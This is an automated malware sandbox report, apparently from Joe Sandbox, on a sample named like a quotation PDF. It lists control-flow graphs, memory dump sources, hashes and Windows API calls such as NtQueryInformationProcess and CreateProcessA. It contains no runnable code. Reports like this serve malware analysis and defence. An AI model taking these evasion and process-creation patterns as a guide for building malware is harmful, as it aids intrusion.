                                                                                      control_flow_graph 936 18c1478-18c149b 937 18c149d 936->937 938 18c14a2-18c14fc call 18c00e4 936->938 937->938 942 18c14ff 938->942 943 18c1506-18c1522 942->943 944 18c152b-18c152c 943->944 945 18c1524 943->945 946 18c167c-18c16ec call 18c00f4 944->946 952 18c1531-18c1551 944->952 945->942 945->946 947 18c161d-18c1632 945->947 948 18c15a5-18c1601 945->948 949 18c1575-18c1579 945->949 950 18c1606-18c1618 945->950 951 18c1637-18c1677 945->951 945->952 953 18c1553-18c155b call 18c1ce8 945->953 970 18c16ee call 18c338c 946->970 971 18c16ee call 18c2ce5 946->971 972 18c16ee call 18c2e56 946->972 973 18c16ee call 18c2710 946->973 947->943 948->943 954 18c158c-18c1593 949->954 955 18c157b-18c158a 949->955 950->943 951->943 952->943 956 18c1561-18c1573 953->956 958 18c159a-18c15a0 954->958 955->958 956->943 958->943 969 18c16f4-18c16fe 970->969 971->969 972->969 973->969
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q
                                                                                      • API String ID: 0-3743469327
                                                                                      • Opcode ID: 80e7db3fb41a2c678d5a01736d4988ef9305ae3724a017f077e64b8500c72600
                                                                                      • Instruction ID: d91cfa279a91bf7fc5eea321fe12f36c011d739ff601a520117b636cb7c9df60
                                                                                      • Opcode Fuzzy Hash: 80e7db3fb41a2c678d5a01736d4988ef9305ae3724a017f077e64b8500c72600
                                                                                      • Instruction Fuzzy Hash: 2981B374E01219CFDB08CFA9D984AAEFBB2FF88700F14842AD816AB355D7319905CF54
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 018C980D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcessQuery
                                                                                      • String ID:
                                                                                      • API String ID: 1778838933-0
                                                                                      • Opcode ID: ce498485ff5b62d074a00da9520cefd7bde5fce8cf275bc0f512b53fb165f6c8
                                                                                      • Instruction ID: 590713844dccf5cc2045dc03900372ef7acc9d08db00ff4f99c228d8a2f1f32e
                                                                                      • Opcode Fuzzy Hash: ce498485ff5b62d074a00da9520cefd7bde5fce8cf275bc0f512b53fb165f6c8
                                                                                      • Instruction Fuzzy Hash: F94166B8D04258DFCB10CFAAD984A9EFBB1BB09314F10906AE914B7310D335A905CF64
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 018C980D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcessQuery
                                                                                      • String ID:
                                                                                      • API String ID: 1778838933-0
                                                                                      • Opcode ID: 692f46221b8e7a902d200f741adb9de1bd890e0067e25f23eae95d76529d34fa
                                                                                      • Instruction ID: a0ac52a23d466e2a4deee41dcc103e0efe138c282ebac1c4f5595f02dfdbb665
                                                                                      • Opcode Fuzzy Hash: 692f46221b8e7a902d200f741adb9de1bd890e0067e25f23eae95d76529d34fa
                                                                                      • Instruction Fuzzy Hash: 674168B9D00258DFCB10CFAAD984A9EFBB1BB09310F10A06AE914B7310D335A945CF64
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID: ~r:H
                                                                                      • API String ID: 2962429428-2692719446
                                                                                      • Opcode ID: 362a324820399225cd99fa3154c01601edaf005b9854a588bc3ba4b319fdfb32
                                                                                      • Instruction ID: ab9114dff736bf232a529dd896e4cfb40dc8dac85b5a42c2be88dd6780741964
                                                                                      • Opcode Fuzzy Hash: 362a324820399225cd99fa3154c01601edaf005b9854a588bc3ba4b319fdfb32
                                                                                      • Instruction Fuzzy Hash: 65B12870E0522DDFDB18DFE9D884A9DBBB2FB88704F10856DD405AB258EB349A41CF15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 773768622cdbd7580ffb5c7d6ce84a113e5e49570530b81e39edca643edeee19
                                                                                      • Instruction ID: 00e5af823db2226a66c48475a209c6a17f3f72552ebcf0a3ce3812861a58a32a
                                                                                      • Opcode Fuzzy Hash: 773768622cdbd7580ffb5c7d6ce84a113e5e49570530b81e39edca643edeee19
                                                                                      • Instruction Fuzzy Hash: 1C223A71A10219CFDB64EF68C884BADB7F1BF48300F1481A9D44AEB255DB74AD85CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1726298566.0000000012510000.00000040.00000800.00020000.00000000.sdmp, Offset: 12510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12510000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 497f625e7ae0b31523fcca2e6cfed20f545b342668c42732571b47868fe9ada1
                                                                                      • Instruction ID: efdd15fcdc0a095985d72177cca3d9c21777b3596e120be2341ce636b3991882
                                                                                      • Opcode Fuzzy Hash: 497f625e7ae0b31523fcca2e6cfed20f545b342668c42732571b47868fe9ada1
                                                                                      • Instruction Fuzzy Hash: F0E1ABB6B013248BEB19DB75C890BAF7BF6AF89748F104469E546DF290DB35E801CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c963eefef37a344e70a28c6d79a5ce2941757656609af8daeb7c238488f33ad
                                                                                      • Instruction ID: 4677d2b0a93e8399b6a3135e65f3f1f6e228933174e01158aec81ec70d73d22e
                                                                                      • Opcode Fuzzy Hash: 2c963eefef37a344e70a28c6d79a5ce2941757656609af8daeb7c238488f33ad
                                                                                      • Instruction Fuzzy Hash: CDC1B074E012189FDB54DFA9D884A9EBBF2FF89300F1481A9D809AB355DB349A81CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 333fb3b2d5324766800fea1534d41fcb76e27f068acb4594dca87bd383878bf2
                                                                                      • Instruction ID: 3d02f384d6ec97b080986b0db0d10bd03070024682fa2a87f53e9965398cebf9
                                                                                      • Opcode Fuzzy Hash: 333fb3b2d5324766800fea1534d41fcb76e27f068acb4594dca87bd383878bf2
                                                                                      • Instruction Fuzzy Hash: D0C1A074E01219DFDB58DFA9D844A9EBBF2FF89300F1081A9D809AB355DB349A81CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9170e20ce2b4558e336db7fbc22f29ed55a5d52b6faa3ae15cca924897b962b0
                                                                                      • Instruction ID: 0feed691e5f8b9c817ce601f355d900375f58f7b671f2c1fddcf8f5606f05ac9
                                                                                      • Opcode Fuzzy Hash: 9170e20ce2b4558e336db7fbc22f29ed55a5d52b6faa3ae15cca924897b962b0
                                                                                      • Instruction Fuzzy Hash: 80A18535E01319DFCB04EFA4D854ADEF7BAFF99304F158616E419AB2A4DB30A942CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 407619f43e3195391831884cf19a4a45dc23b115498b258bd755f1dbcbfee9cf
                                                                                      • Instruction ID: 3a2f769bb416a90aa13733867d6f69fa6ffb833334c1e67cf30c7014214b0765
                                                                                      • Opcode Fuzzy Hash: 407619f43e3195391831884cf19a4a45dc23b115498b258bd755f1dbcbfee9cf
                                                                                      • Instruction Fuzzy Hash: 38918435E01319DFCB04EFA0D8949DEFBBAFF99304B158615F419AB2A4DB30A942CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b282eb67ce4e724183739134155c805066c95c444f16a69d9280d6f04dc01b9c
                                                                                      • Instruction ID: 0da6ff960a73a6b52ceb7eae635acca9b4042a39cb24289fc908c87c1c0fff34
                                                                                      • Opcode Fuzzy Hash: b282eb67ce4e724183739134155c805066c95c444f16a69d9280d6f04dc01b9c
                                                                                      • Instruction Fuzzy Hash: B7917235E01319DFCB04DFA0D894ADEF7BAFF99304B158215F819AB2A4DB30A946CB51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 96bf3a12b34fa391cba214ff289560f3fd087cd2fcc9f709f66c34d41f94116d
                                                                                      • Instruction ID: e5fe3addb6c01ec28508a7776bdd11c8db5c595610b59dadf8d2966be343984c
                                                                                      • Opcode Fuzzy Hash: 96bf3a12b34fa391cba214ff289560f3fd087cd2fcc9f709f66c34d41f94116d
                                                                                      • Instruction Fuzzy Hash: 9E7155B4E4120DDFCB14CFA9D494AAEBBB2FF89304F10846AD41AAB354DB349A01CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18f796976153b6cd776899a5c61de06237941a9e2359d9f1f3adea322e58f24d
                                                                                      • Instruction ID: 38cc57f4ff78c015cde317e5ee3c80731e9c1c1178feafa4191ba56ad8291555
                                                                                      • Opcode Fuzzy Hash: 18f796976153b6cd776899a5c61de06237941a9e2359d9f1f3adea322e58f24d
                                                                                      • Instruction Fuzzy Hash: BB615C70D05209CFCB04DFAAC4846AEFBF2FB89700F24D46AD516EB256D7349A418F94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b7617ab15d873801a8b83d069d03daf240ff7121af59537c2f5fb2dea529a40
                                                                                      • Instruction ID: 5583d52848cf207e83e0bc0f1f8321b1b213b3bffcfcd5d2688ef85b4a74bacf
                                                                                      • Opcode Fuzzy Hash: 7b7617ab15d873801a8b83d069d03daf240ff7121af59537c2f5fb2dea529a40
                                                                                      • Instruction Fuzzy Hash: A451CFB4D142189FDB18CFAAD984ADEBBF2BF88300F14D06AD418BB264DB749945CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8d7e697924c7418c973f3f6ef6cde66b9b2ee4e47cc964e42dbeb8b11d861358
                                                                                      • Instruction ID: a44a9ee21da092a6f264a28304ea58af76438610a7d47fbc5008264dcbb44ec8
                                                                                      • Opcode Fuzzy Hash: 8d7e697924c7418c973f3f6ef6cde66b9b2ee4e47cc964e42dbeb8b11d861358
                                                                                      • Instruction Fuzzy Hash: F7512275E11719CBCB18DFA9C8405DDFBB2FF89714F20862AD409AB214EB30AA46CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c24d1162ae2b31fa3d813ab92cd29e910ab50a3c7525b134124d1dec0ff85e3c
                                                                                      • Instruction ID: 9766b8c58747c00548cf39e8c04bb473f5fc6c9510e1dc3e4c483d9e67373207
                                                                                      • Opcode Fuzzy Hash: c24d1162ae2b31fa3d813ab92cd29e910ab50a3c7525b134124d1dec0ff85e3c
                                                                                      • Instruction Fuzzy Hash: 43511475E1165DCBDB14DFE9C8405EDFBB6BF88704F20862AD409AB254EB30AA46CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71433101f22144281503ef713d44ea3f4e323a459c4283cf4e458477e8d80f66
                                                                                      • Instruction ID: 435691db502718fee3b457e97f4ec02ab56bf172e7582909f0e12fa05cf4cf63
                                                                                      • Opcode Fuzzy Hash: 71433101f22144281503ef713d44ea3f4e323a459c4283cf4e458477e8d80f66
                                                                                      • Instruction Fuzzy Hash: 2C21FD71E056588BDB18CFABD8442DEFBF3AFC9310F14C06AD508AA268DB355A45CF90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2736d13daa47d94de89d64f12378885fff499e507e88bbc45995f223acd186c0
                                                                                      • Instruction ID: c922785507c66f4cf1bcc6587fcba43c99cf2ba9f8c366b1573db2925aa5d765
                                                                                      • Opcode Fuzzy Hash: 2736d13daa47d94de89d64f12378885fff499e507e88bbc45995f223acd186c0
                                                                                      • Instruction Fuzzy Hash: 9821BB71D146589BEB28CFABC9406DEFBF7AFC9300F14C06AC458AB255EB7049458F50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 551 a1bdf34-a1bdfd9 553 a1bdfdb-a1bdff2 551->553 554 a1be022-a1be04a 551->554 553->554 557 a1bdff4-a1bdff9 553->557 558 a1be04c-a1be060 554->558 559 a1be090-a1be0e6 554->559 560 a1bdffb-a1be005 557->560 561 a1be01c-a1be01f 557->561 558->559 566 a1be062-a1be067 558->566 568 a1be0e8-a1be0fc 559->568 569 a1be12c-a1be21a CreateProcessA 559->569 563 a1be009-a1be018 560->563 564 a1be007 560->564 561->554 563->563 567 a1be01a 563->567 564->563 570 a1be08a-a1be08d 566->570 571 a1be069-a1be073 566->571 567->561 568->569 577 a1be0fe-a1be103 568->577 587 a1be21c-a1be222 569->587 588 a1be223-a1be308 569->588 570->559 572 a1be077-a1be086 571->572 573 a1be075 571->573 572->572 576 a1be088 572->576 573->572 576->570 579 a1be126-a1be129 577->579 580 a1be105-a1be10f 577->580 579->569 581 a1be113-a1be122 580->581 582 a1be111 580->582 581->581 583 a1be124 581->583 582->581 583->579 587->588 600 a1be30a-a1be30e 588->600 601 a1be318-a1be31c 588->601 600->601 602 a1be310 600->602 603 a1be31e-a1be322 601->603 604 a1be32c-a1be330 601->604 602->601 603->604 605 a1be324 603->605 606 a1be332-a1be336 604->606 607 a1be340-a1be344 604->607 605->604 606->607 610 a1be338 606->610 608 a1be37a-a1be385 607->608 609 a1be346-a1be36f 607->609 614 a1be386 608->614 609->608 610->607 614->614
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A1BE207
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID: 6B$6B$6B
                                                                                      • API String ID: 963392458-3453692454
                                                                                      • Opcode ID: bddfcfded9c449d08df5b406d0379bead31b9103d0c69528d6978044af7d8ad6
                                                                                      • Instruction ID: 655e5b1af541a6260b0b01806c4c8cb3bdbdd384dbe0ad5919c5447dbb276b65
                                                                                      • Opcode Fuzzy Hash: bddfcfded9c449d08df5b406d0379bead31b9103d0c69528d6978044af7d8ad6
                                                                                      • Instruction Fuzzy Hash: EFC13874D102198FDB20CFA8C845BEDBBB1BF49300F0495AAD859B7290DB749A85CF95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 615 a1bdf40-a1bdfd9 617 a1bdfdb-a1bdff2 615->617 618 a1be022-a1be04a 615->618 617->618 621 a1bdff4-a1bdff9 617->621 622 a1be04c-a1be060 618->622 623 a1be090-a1be0e6 618->623 624 a1bdffb-a1be005 621->624 625 a1be01c-a1be01f 621->625 622->623 630 a1be062-a1be067 622->630 632 a1be0e8-a1be0fc 623->632 633 a1be12c-a1be21a CreateProcessA 623->633 627 a1be009-a1be018 624->627 628 a1be007 624->628 625->618 627->627 631 a1be01a 627->631 628->627 634 a1be08a-a1be08d 630->634 635 a1be069-a1be073 630->635 631->625 632->633 641 a1be0fe-a1be103 632->641 651 a1be21c-a1be222 633->651 652 a1be223-a1be308 633->652 634->623 636 a1be077-a1be086 635->636 637 a1be075 635->637 636->636 640 a1be088 636->640 637->636 640->634 643 a1be126-a1be129 641->643 644 a1be105-a1be10f 641->644 643->633 645 a1be113-a1be122 644->645 646 a1be111 644->646 645->645 647 a1be124 645->647 646->645 647->643 651->652 664 a1be30a-a1be30e 652->664 665 a1be318-a1be31c 652->665 664->665 666 a1be310 664->666 667 a1be31e-a1be322 665->667 668 a1be32c-a1be330 665->668 666->665 667->668 669 a1be324 667->669 670 a1be332-a1be336 668->670 671 a1be340-a1be344 668->671 669->668 670->671 674 a1be338 670->674 672 a1be37a-a1be385 671->672 673 a1be346-a1be36f 671->673 678 a1be386 672->678 673->672 674->671 678->678
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A1BE207
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID: 6B$6B$6B
                                                                                      • API String ID: 963392458-3453692454
                                                                                      • Opcode ID: a46b3bacc289e0a5c1003a90f9d4e2156a5c0bf20e050c80cf66af00e5522df2
                                                                                      • Instruction ID: 5e0a0e6cadf71e0721823b55cc67ce1dd2a140c6121a3ea2775e3c7499d2568a
                                                                                      • Opcode Fuzzy Hash: a46b3bacc289e0a5c1003a90f9d4e2156a5c0bf20e050c80cf66af00e5522df2
                                                                                      • Instruction Fuzzy Hash: 03C12770D1022D8FDB24CFA8C845BEDBBB1BF49300F0495AAD859B7290DB749A85CF95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 679 3058628-3058634 680 3058664-30586c7 GetCurrentProcess 679->680 681 3058636 679->681 687 30586d0-3058704 GetCurrentThread 680->687 688 30586c9-30586cf 680->688 682 305863f-3058661 681->682 683 3058638-305863e 681->683 682->680 683->682 689 3058706-305870c 687->689 690 305870d-3058741 GetCurrentProcess 687->690 688->687 689->690 692 3058743-3058749 690->692 693 305874a-3058765 call 3058808 690->693 692->693 696 305876b-305879a GetCurrentThreadId 693->696 697 30587a3-3058805 696->697 698 305879c-30587a2 696->698 698->697
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 030586B6
                                                                                      • GetCurrentThread.KERNEL32 ref: 030586F3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 03058730
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03058789
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 9907a174502e97a605fdf06b264e056bc52786c3ecc05b389a3c04f9a3d2e652
                                                                                      • Instruction ID: 9cdff485805e1a8d8871203b70682f7cb98d12a074e0b0e18b4c51b1b4bb5ee9
                                                                                      • Opcode Fuzzy Hash: 9907a174502e97a605fdf06b264e056bc52786c3ecc05b389a3c04f9a3d2e652
                                                                                      • Instruction Fuzzy Hash: CA5178B0A113498FDB14DFAAD948B9EBFF1EF48314F24C459E419A72A0C734A984CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 705 3058638-30586c7 GetCurrentProcess 711 30586d0-3058704 GetCurrentThread 705->711 712 30586c9-30586cf 705->712 713 3058706-305870c 711->713 714 305870d-3058741 GetCurrentProcess 711->714 712->711 713->714 716 3058743-3058749 714->716 717 305874a-3058765 call 3058808 714->717 716->717 720 305876b-305879a GetCurrentThreadId 717->720 721 30587a3-3058805 720->721 722 305879c-30587a2 720->722 722->721
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 030586B6
                                                                                      • GetCurrentThread.KERNEL32 ref: 030586F3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 03058730
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03058789
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 8e2dc4917fe959009b97681740d953b5ddde5965d722ad662a6abc5d0ca14b9a
                                                                                      • Instruction ID: 0872b9638e93c842435ee8bf67b12138c6a7c271246c72a8caa6324df4aec0fe
                                                                                      • Opcode Fuzzy Hash: 8e2dc4917fe959009b97681740d953b5ddde5965d722ad662a6abc5d0ca14b9a
                                                                                      • Instruction Fuzzy Hash: 215175B0A113098FDB08DFAAD548BAEBBF1EF48310F20C459E419A7360D7349984CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1000 3056250-305625f 1001 3056261-305626e call 3055edc 1000->1001 1002 305628b-305628f 1000->1002 1008 3056284 1001->1008 1009 3056270 1001->1009 1004 3056291-305629b 1002->1004 1005 30562a3-30562e4 1002->1005 1004->1005 1011 30562e6-30562ee 1005->1011 1012 30562f1-30562ff 1005->1012 1008->1002 1058 3056276 call 3056520 1009->1058 1059 3056276 call 3056530 1009->1059 1011->1012 1013 3056301-3056306 1012->1013 1014 3056323-3056325 1012->1014 1016 3056311 1013->1016 1017 3056308-305630f call 3055ee8 1013->1017 1019 3056328-305632f 1014->1019 1015 305627c-305627e 1015->1008 1018 30563c0-305643e 1015->1018 1023 3056313-3056321 1016->1023 1017->1023 1050 3056447-3056491 1018->1050 1051 3056440-3056446 1018->1051 1021 3056331-3056339 1019->1021 1022 305633c-3056343 1019->1022 1021->1022 1026 3056345-305634d 1022->1026 1027 3056350-3056359 call 3055ef8 1022->1027 1023->1019 1026->1027 1031 3056366-305636b 1027->1031 1032 305635b-3056363 1027->1032 1033 305636d-3056374 1031->1033 1034 3056389-3056396 1031->1034 1032->1031 1033->1034 1036 3056376-3056386 call 3055f08 call 3055f18 1033->1036 1041 30563b9-30563bf 1034->1041 1042 3056398-30563b6 1034->1042 1036->1034 1042->1041 1052 30564a5-30564e2 GetModuleHandleW 1050->1052 1053 3056493-30564a2 1050->1053 1051->1050 1054 30564e4-30564ea 1052->1054 1055 30564eb-3056519 1052->1055 1053->1052 1054->1055 1058->1015 1059->1015
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(?), ref: 030564D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 6bea4d4f02ff759c0808eb244722765158e4ca2bd156262853965109a4267afd
                                                                                      • Instruction ID: ed41e8853c9562763efbb3a95e8db086f5f6042cff9d6e383745ec42bee9964d
                                                                                      • Opcode Fuzzy Hash: 6bea4d4f02ff759c0808eb244722765158e4ca2bd156262853965109a4267afd
                                                                                      • Instruction Fuzzy Hash: 5D912470A01B098FDB64DF69D44479ABBF1BF88300F149929E84AE7650DB35E845CF94
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0305D0F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: bfb94f9ffa9ad61a0db00583b318a078a1e39e814344b791001966c44265fd93
                                                                                      • Instruction ID: 0c5680243e1019529cc106bf926d46c9aa372ff88f1130a690d708845e7016f0
                                                                                      • Opcode Fuzzy Hash: bfb94f9ffa9ad61a0db00583b318a078a1e39e814344b791001966c44265fd93
                                                                                      • Instruction Fuzzy Hash: 4F718EB4D01218DFDF20CFA9D984ADEBBF1BB09304F1491AAE858A7211D7309A85CF55
